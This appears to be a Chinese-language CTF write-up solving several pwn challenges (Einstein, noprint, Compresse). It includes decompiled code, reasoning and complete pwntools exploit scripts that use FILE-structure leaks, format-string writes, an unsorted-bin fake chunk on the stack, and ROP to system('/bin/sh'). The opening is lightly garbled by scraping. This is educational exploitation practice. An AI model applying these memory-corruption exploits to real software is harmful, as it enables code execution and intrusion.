网站 售前,重庆装修公司电话,徐州建设网站公司,wordpress 云主机 ssl这种比赛得0也不容易#xff0c;前边暖声还是能作的。
GOT
指针前溢出#xff0c;可以溢出到GOT表#xff0c;然后把后门写上就行
Einstein
这个拿到WP也没复现成#xff0c;最后自己改了一下。
int __cdecl handle()
{int offset; // [rsp8h] [rbp-38h] BYREFunsigne…这种比赛得0也不容易前边暖声还是能作的。
GOT
指针前溢出可以溢出到GOT表然后把后门写上就行
Einstein
这个拿到WP也没复现成最后自己改了一下。
int __cdecl handle()
{int offset; // [rsp8h] [rbp-38h] BYREFunsigned int size; // [rspCh] [rbp-34h] BYREFunsigned __int64 *wher; // [rsp10h] [rbp-30h] BYREFunsigned __int64 wat; // [rsp18h] [rbp-28h] BYREFunsigned __int64 *wher2; // [rsp20h] [rbp-20h] BYREFunsigned __int64 wat2; // [rsp28h] [rbp-18h] BYREFvoid *allocated; // [rsp30h] [rbp-10h]unsigned __int64 v8; // [rsp38h] [rbp-8h]v8 __readfsqword(0x28u);puts(\nHow long is your story ?);__isoc99_scanf(%u, size);if ( size 0x27 ){puts(Well... It seems you dont really want to talk to me that much, cya.);_exit(1337);}allocated malloc(size);puts(Whats the distortion of time and space ?);__isoc99_scanf(%u, offset);puts(Well your story is quite long, time may be distored, but it is a priceless ressource, ill give you a few words only, use them wisely.);read(0, (char *)allocated offset, 0x22uLL);puts(Everything is relative... Or is it ???);__isoc99_scanf(%llu %llu, wher, wat);__isoc99_scanf(%llu %llu, wher2, wat2);*wher wat;*wher2 wat2;return 0;
}
题目很短先建堆块大小无限制。然后可以以这个为偏移写34字节然后可以向两个地址写值。
这题dockerfile的是23.10,这种题没有libc是没法作的。问了几个人都不知道这个是什么版本。因为这个版本不常见libc-2.38还好问了csdn的c知道还真知道。
思路很简单当建大块是0x200000以上时会用mmap建块这个块大概率与libc相邻。再高版本可能就不相邻了。然后往_IO_2_1_stdout_里写东西常见的_IO_write_base尾字节改为0可以得到libc地址。不过这题还不行这题改_IO_write_ptr的尾两字节为FFFF这样泄露的东西更多。可以得到栈地址这样就好在栈里写跳转了。
WP是在返回地址写execve,在返回里rdi指向处写/bin/sh但试了不行这个地址是scanf那得到的这时会写上scanf过滤到的那串数字而且不会把/bin/sh写到上边。
于是想了另外一个方法在低版本时一般会写one_gadget在高版本很少用了。不过这题可以。这里rbp是正常的所以显然可写rax0只需要一个[rbp-0x78]0,可以利用第2个给他写清0 0xeb66b execve(/bin/sh, rbp-0x50, [rbp-0x78]) constraints: address rbp-0x50 is writable rax NULL || {/bin/sh, rax, NULL} is a valid argv [[rbp-0x78]] NULL || [rbp-0x78] NULL || [rbp-0x78] is a valid envp from pwn import *
context(archamd64, log_leveldebug)libc ELF(/home/kali/glibc/libs/2.38-1ubuntu6.3_amd64/libc.so.6) #ubuntu 23.10 libc 2.38
elf ELF(./einstein)p process(./einstein)
#gdb.attach(p, b*0x5555555553a7\nc)#stdout-_IO_write_ptr 的尾两字节改为ffff 泄露出libc和envp指向argv[0]的指针得到栈地址
p.sendlineafter(b\nHow long is your story ?\n, str(0x200000).encode())
p.sendlineafter(bWhats the distortion of time and space ?\n, str(0x201000-0x10 libc.sym[_IO_2_1_stdout_] 0x28))
p.sendafter(buse them wisely.\n, b\xff\xff)p.recv(0x55)
libc.address u64(p.recv(8)) - libc.sym[_IO_file_jumps]
p.recv(0x40)
stack u64(p.recv(8)) #2d:0168│ rbx 0x7fffffffde68 —▸ 0x7fffffffe1fe ◂— ./einstein
print(f{libc.address :x} {stack :x})
0xeb66b execve(/bin/sh, rbp-0x50, [rbp-0x78])
constraints:address rbp-0x50 is writablerax NULL || {/bin/sh, rax, NULL} is a valid argv[[rbp-0x78]] NULL || [rbp-0x78] NULL || [rbp-0x78] is a valid envpp.recvuntil(b???\n)
#09:0048│008 0x7fffffffdd48 —▸ 0x555555555244 (main74) ◂— mov rax, 0x3c
p.sendline(f{stack-0x120} {libc.address 0xeb66b}.encode()) #one_gadget
p.sendline(f{stack-0x190} {0}.encode()) #rbp-0x780p.interactive()noprint
这个也很短也很新鲜。有一个不限次数的fprintf漏洞但数据写到堆里并且输出写到/dev/null
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{FILE *stream; // [rsp20h] [rbp-10h]char *buf; // [rsp28h] [rbp-8h]puts(Hello from the void);init(argv, envp);setbuf(_bss_start, 0LL);setbuf(stdin, 0LL);stream fopen(/dev/null, a);for ( buf (char *)malloc(0x100uLL); ; fprintf(stream, buf) )buf[read(0, buf, 0x100uLL) - 1] 0;
}
思路就是直接改IO_file的fileid和flagfileid1就会写到stdout了。然后就没难度了。
但写fileid需要一个指针。打开的文件放在堆里而一般加载地址跟堆地址的前两字节相同。利用栈里的一个地址改成堆地址。偏移9是指向文件结构的指针直接输出这个地址再加上偏移就行。
from pwn import *
context(archamd64, log_leveldebug)libc ELF(./libc.so.6)
elf ELF(./noprint)#p process(./noprint)
#gdb.attach(p, b*0x5555555553ac\nc)
p remote(noprint.phreaks2600.fr, 1337)p.recvline()#修改stream.fileid1,stream.flag0xfbad2887 转到stdout 得到输出
#13-21-stream.fildid
#p.send(b%c%c%c%c%c%c%c%105c%*c%13$n.ljust(0x100, b\0))
p.send(b%112c%*9$c%13$n.ljust(0x100, b\0)) #同上 输入#9112 使#13指向 stream0x70:fileid
p.send(b.%21$lln.ljust(0x100, b\0))
#9-0xfbad2887
p.send(f%{0x2887}c%9$hn.encode().ljust(0x100, b\0))#leak stack,libc
p.send(b%11$p %12$p %16$p %4096c.ljust(0x100, b\0))
p.recvuntil(b0x)
stack int(p.recvuntil(b ), 16) - 0xd8
libc.address int(p.recvuntil(b ), 16) - 0x2a3b8
elf.address int(p.recvuntil(b ), 16) - 0x12e4
print(f{stack :x} {libc.address :x} {elf.address :x})
pop_rdi libc.address 0x00000000000cee4d # pop rdi ; ret
bin_sh next(libc.search(b/bin/sh\0))
system libc.sym[system]
ret elf.address 0x12e3#fprintf的返回地址改为 ret,pop_rdi,bin_sh,system
#11-31-target fprintf.ret8
def write_v(target,val):p.send(f%{target0xffff}c%11$hhn.encode().ljust(0x100, b\0))p.send(f%{val0xffff}c%31$hn.encode().ljust(0x100, b\0))p.send(f%{(target2)0xff}c%11$hhn.encode().ljust(0x100, b\0))p.send(f%{(val16)0xffff}c%31$hn.encode().ljust(0x100, b\0))p.send(f%{(target4)0xff}c%11$hhn.encode().ljust(0x100, b\0))p.send(f%{(val32)0xffff}c%31$n.encode().ljust(0x100, b\0))p.send(f%{stack0xffff}c%11$hn.encode().ljust(0x100, b\0))
write_v(stack8, pop_rdi)
write_v(stack16, bin_sh)
write_v(stack24, system)#gdb.attach(p, b*0x5555555553ac\nc)p.send(f%{stack0xff}c%11$hhn.encode().ljust(0x100, b\0))
p.send(f%{ret0xffff}c%31$hn.encode().ljust(0x100, b\0))p.interactive()
#PWNME{0837e3827df3c6a04684b5942a8cab03}
0x00007fffffffde28│0x0028: 0x00005555555553ac → main200 nop 13ac-12e3 : ret
gef➤ tel 40
0x00007fffffffdda0│0x0000: 0x0000000000000000 ← $rsp
0x00007fffffffdda8│0x0008: 0x00007fffffffdf08 → 0x0000000000000000 #6
0x00007fffffffddb0│0x0010: 0x00007fffffffdef8 → 0x0000000000000000 #7
0x00007fffffffddb8│0x0018: 0x00000001f7fe54e0
0x00007fffffffddc0│0x0020: 0x000055555555b6b0 → 0x00000000fbad3c84 #9 file.flag-...2887 #
0x00007fffffffddc8│0x0028: 0x000055555555b890 → 0x0000000000007325 #10 buf
0x00007fffffffddd0│0x0030: 0x00007fffffffde70 → 0x00007fffffffded0 → 0x0000000000000000 ← $rbp #11-31-target 泄露栈地址
0x00007fffffffddd8│0x0038: 0x00007ffff7c2a3b8 → __libc_start_call_main120 mov edi, eax #泄露libc
0x00007fffffffdde0│0x0040: 0x00007fffffffde20 → 0x0000555555557d90 → 0x00005555555551c0 #13-21-stream.fildid:3-1
0x00007fffffffdde8│0x0048: 0x00007fffffffdef8 → 0x0000000000000000
0x00007fffffffddf0│0x0050: 0x0000000155554040
0x00007fffffffddf8│0x0058: 0x00005555555552e4 → main0 endbr64 #泄露加载地址
0x00007fffffffde00│0x0060: 0x00007fffffffdef8 → 0x0000000000000000
0x00007fffffffde08│0x0068: 0xb6197b08324563f7
0x00007fffffffde10│0x0070: 0x0000000000000001
0x00007fffffffde18│0x0078: 0x0000000000000000
0x00007fffffffde20│0x0080: 0x0000555555557d90 → 0x00005555555551c0 → __do_global_dtors_aux0 endbr64
0x00007fffffffde28│0x0088: 0x00007ffff7ffd000 → 0x00007ffff7ffe2e0 → 0x0000555555554000 → 0x00010102464c457f
0x00007fffffffde30│0x0090: 0xb6197b08356563f7
0x00007fffffffde38│0x0098: 0xb6196b72c87b63f7
0x00007fffffffde40│0x00a0: 0x00007fff00000000
0x00007fffffffde48│0x00a8: 0x0000000000000000
0x00007fffffffde50│0x00b0: 0x0000000000000000
0x00007fffffffde58│0x00b8: 0x0000000000000001
0x00007fffffffde60│0x00c0: 0x00007fffffffdef0 → 0x0000000000000001
0x00007fffffffde68│0x00c8: 0x237282e3d7233c00
0x00007fffffffde70│0x00d0: 0x00007fffffffded0 → 0x0000000000000000 #31
0x00007fffffffde78│0x00d8: 0x00007ffff7c2a47b → __libc_start_main_impl139 # 0x7ffff7e10f98
0x00007fffffffde80│0x00e0: 0x00007fffffffdf08 → 0x0000000000000000
0x00007fffffffde88│0x00e8: 0x0000555555557d90 → 0x00005555555551c0 → __do_global_dtors_aux0 endbr64
0x00007fffffffde90│0x00f0: 0x00007fffffffdf08 → 0x0000000000000000
0x00007fffffffde98│0x00f8: 0x00005555555552e4 → main0 endbr64
0x00007fffffffdea0│0x0100: 0x0000000000000000
0x00007fffffffdea8│0x0108: 0x0000000000000000
0x00007fffffffdeb0│0x0110: 0x0000555555555120 → _start0 endbr64
0x00007fffffffdeb8│0x0118: 0x00007fffffffdef0 → 0x0000000000000001
0x00007fffffffdec0│0x0120: 0x0000000000000000
0x00007fffffffdec8│0x0128: 0x0000000000000000
0x00007fffffffded0│0x0130: 0x0000000000000000 #43
0x00007fffffffded8│0x0138: 0x0000555555555145 → _start37 hlt gef➤ x/80gx 0x000055555555b6b0
0x55555555b6b0: 0x00000000fbad3c84 -- flag
0x55555555b720: 0x0000000000000003 -- fileidCompresse
这题利用unsort bin建fake到栈里这个方法头回见。
一般情况下unsorted bin attack修改bk会把堆地址写到bk指向位置但高版本检查通不过了。
菜单有8项
unsigned __int64 menu()
{unsigned int v1; // [rsp8h] [rbp-4A8h]int v2; // [rspCh] [rbp-4A4h]char s[128]; // [rsp10h] [rbp-4A0h] BYREFchar v4[512]; // [rsp90h] [rbp-420h] BYREFchar v5[512]; // [rsp290h] [rbp-220h] BYREFvoid *v6; // [rsp490h] [rbp-20h]char buf[10]; // [rsp49Eh] [rbp-12h] BYREFunsigned __int64 v8; // [rsp4A8h] [rbp-8h]v8 __readfsqword(0x28u);v1 0;v6 0LL;do{puts(\nMenu:);puts(1. Flate);puts(2. Deflate);puts(3. New note);puts(4. Edit note);puts(5. Delete note);puts(6. View note);puts(7. Select note);puts(8. Exit);printf(Enter your choice: );fflush(_bss_start);read(0, buf, 0xAuLL);v2 atoi(buf);switch ( v2 ){case 1:printf(Enter a string to flate: );fflush(_bss_start);read(0, s, 0x80uLL);s[strcspn(s, \n)] 0;flate_string(s, (__int64)v5);printf(Flated: %s\n, v5);break;case 2:printf(Enter a string to deflate: );fflush(_bss_start);read(0, s, 0x80uLL);s[strcspn(s, \n)] 0;deflate_string(s, (__int64)v4);printf(Deflated: %s\n, v4);break;case 3:v6 new_note();break;case 4:edit_note(v6);break;case 5:v6 (void *)delete_note(v6, v1);break;case 6:print_note((const char *)v6);break;case 7:printf(Enter a note to select: );fflush(_bss_start);read(0, s, 2uLL);v1 atoi(s);if ( v1 3 v1 note_count ){v6 (void *)notes[v1];printf(Current note is : %d\n, v1);}else{puts(Bad index);v1 0;}break;case 8:puts(Bye !);break;default:puts(Invalid choice. Please try again.);break;}}while ( v2 ! 8 );return v8 - __readfsqword(0x28u); 1是解压缩比如2A3B会被改成AABBB最后加\0但这里有个漏洞当输入的数字之和到大于512时就会直接返回不加\0,可以利用它在解压数据后加个大数避开\0截断带出栈内残留的地址。栈里这块有512字节里边有加载地址libc和栈都有。另外在解压区后边是堆指针当输入512长度里\0会写到堆指针尾部相当于off_by_null这样堆指针就会变小从而可能以控制堆头。
2是压缩用不到
3-6是建、删、修改、输出。只能是固定410大小4次并且会清指针没啥问题
7是选择块由于选块、修改不在同一函数内可以实现控制块头。
先利用解压漏洞泄露地址
然后修改块头使它包含块0和大部分块1避免与top chunk合并释放再建块剩余的unsort会落在chunk1的位置通过修改chunk1在这里将fake_chunk连到unsort里。当建块时第1个块不够大会跳到fake.
需要绕过的检查
1unsort.bk-fake unsort0x10-fake
2unsort块底部的块检查下个块的pre_size和size要正常
3fake.fd-chunk1,fake.bk-chunk10x10
4fake的底部下个块的pre_size和size
最后是比较麻烦的通过修改指针尾字节可以向前写溢出但edit的时候会memset(0)而且edit有canary栈保护所以只有当尾字节是30里覆盖成00恰好写到edit的rbp和ret上。所以需要爆破一下1/16还算不大黑。
from pwn import *
context(archamd64, log_leveldebug)libc ELF(./libc.so.6)
elf ELF(./compresse)#输入3a2b时会解码成 aaabb最后补0 当数据长度超过512时直接退出不补0
def flate(msg):p.sendlineafter(bEnter your choice: ,b1)p.sendafter(bEnter a string to flate: , msg)def add(msgba):p.sendlineafter(bEnter your choice: ,b3)p.sendafter(bEnter your note: , msg)def edit(msg):p.sendlineafter(bEnter your choice: ,b4)p.sendafter(bEdit your note: , msg)def free():p.sendlineafter(bEnter your choice: ,b5)def show():p.sendlineafter(bEnter your choice: ,b6)def choice(idx):p.sendlineafter(bEnter your choice: ,b7)p.sendlineafter(bEnter a note to select: ,str(idx).encode())p process(./compresse)add()
add(ba*0x3d0flat(0,0x41))
pwndbg x/80gx $rsp0x290
0x7fffffffdb00: 0x00005555555561d8 -elf
0x7fffffffdb10: 0x00007fffffffdb50 0x00007ffff7cad7e2 - libc
0x7fffffffdb50: 0x00007fffffffdc20 - stack
0x7fffffffdd00: 0x000055555555bad0 - heap#gdb.attach(p,b*0x555555555947\nc)
#输入第2段大于512时会将栈内的地址带出
flate(b888b)
p.recvuntil(bFlated: )
elf.address u64(p.recvline()[:-1]b\0\0) - 0x21d8
print(f{elf.address :x})flate(b24a888b)
p.recvuntil(ba*24)
libc.address u64(p.recvline()[:-1]b\0\0) - 0xad7e2
print(f{libc.address :x})flate(b80a888b)
p.recvuntil(ba*80)
stack u64(p.recvline()[:-1]b\0\0) - 0x120 #v5 ,rsp0x290
print(f{stack :x})#输入512长并跳出时带出堆地址
flate(b512a888b)
p.recvuntil(ba*512)
heap u64(p.recvline()[:-1]b\0\0)
print(f{heap :x})
chunk0 heap - 0x430 #chunk0.pre_size
chunk1 heap - 0x10#将堆地址尾字节覆盖为0修改堆头部改大与chunk1部分释放再建块unsort与chunk1重叠
# | chunk0 | chunk1 |
# | unsort800 |40|
choice(0)
flate(b512a\n) #chunk0 xxx6b0-xxx600
edit(b\0*0xa8 p64(0x801)) #421-801
choice(0)
free()#在栈内伪造一个unsort块 伪造头部、底部绕过检查
#尾部下一块的pre_size,size
#v5 0x1a0 : pre_size:0x420 size:0x20
for i in range(7):flate(f{0x1a8}a{7-i}a\n.encode())
flate(f{0x1a8}a1 \n.encode())for i in range(7):flate(f{0x1a0}a{7-i}a\n.encode())
flate(b416a1\x201\x04\n)#fack_chunk_tail
#pwndbg x/8gx $rsp0x2900x1a0
#0x7fffffffdca0: 0x0000000000000420 0x0000000000000020# | chunk2 | unsort3e0 |40|
add() #gdb.attach(p,b*0x555555555947\nc)
#头部
#fake_head
victim stack - 0x280 #rsp0x10
flate(flat(0, 0x421, chunk1,chunk10x10))pwndbg x/6gx $rsp
0x7fffffffd870: 0x0000000000000009 0x0000000100000000
0x7fffffffd880: 0x0000000000000000 0x0000000000000421
0x7fffffffd890: 0x000055555555bac0 0x000055555555bad0
pwndbg x/4gx $rsp0x420
0x7fffffffdc90: 0x6161616161616161 0x6161616161616161
0x7fffffffdca0: 0x0000000000000420 0x0000000000000020
pwndbg p/x 0xca0-0x880
$1 0x420
#修改unsort块指向fake_chunk
#bk-fake,fd_next-fake
#fake.fd-chunk1,bk-chunk1.fd
choice(1)
edit(flat(libc.address0x203b20, victim,victim, b\0*(0x3e0-0x28), 0x3e0,0x40))
pwndbg x/8gx 0x7ffff7e03b20 main_arena0x50
0x7ffff7e03b20: 0x000055555555bee0 0x0000000000000000
0x7ffff7e03b30: 0x000055555555bac0 0x000055555555bac0 main_arena0x60 - chunk1,chunk1
0x7ffff7e03b40: 0x00007ffff7e03b30 0x00007ffff7e03b30
0x7ffff7e03b50: 0x00007ffff7e03b40 0x00007ffff7e03b40pwndbg x/8gx 0x000055555555bac0 chunk1 unsorted
0x55555555bac0: 0x0000000000000000 0x00000000000003e1
0x55555555bad0: 0x00007ffff7e03b20 0x00007fffffffd880 fd-main_arena0x50,(bk-fake_chunk)
0x55555555bae0: 0x00007fffffffd880 0x0000000000000000 (fd_next-fake_chunk)
...
0x55555555bea0: 0x00000000000003e0 0x0000000000000040pwndbg x/8gx 0x00007fffffffd880 fake_chunk
0x7fffffffd880: 0x0000000000000a31 0x0000000000000421
0x7fffffffd890: 0x000055555555bac0 0x000055555555bad0 fd-chunk1 bk-chunk10x10
...
0x7fffffffdca0: 0x0000000000000420 0x0000000000000020
#将块建到栈内并覆盖尾字节可以向前溢出当edit时覆盖rbp和ret
#memset清0仅当尾字节为0x30时覆盖后可写到rbp,ret
add()
flate(b512a\n)#gdb.attach(p,b*0x5555555555b4\nc)
pop_rdi libc.address 0x000000000010f75b # pop rdi ; ret
ret pop_rdi1
#pop_rsi libc.address 0x0000000000110a4d # pop rsi ; ret
#pop_rax libc.address 0x00000000000dd237 # pop rax ; ret
#pop_rdx libc.address 0x0000000000066b9a # pop rdx ; ret 0x19
#syscall libc.sym[getpid]9
pay flat(ret,ret,pop_rdi, next(libc.search(b/bin/sh\0)), libc.sym[system])#when fake_chunk xx30 write edit.rbp_ret 1/16
# edit canary,rbp,ret
edit(pay)p.interactive()
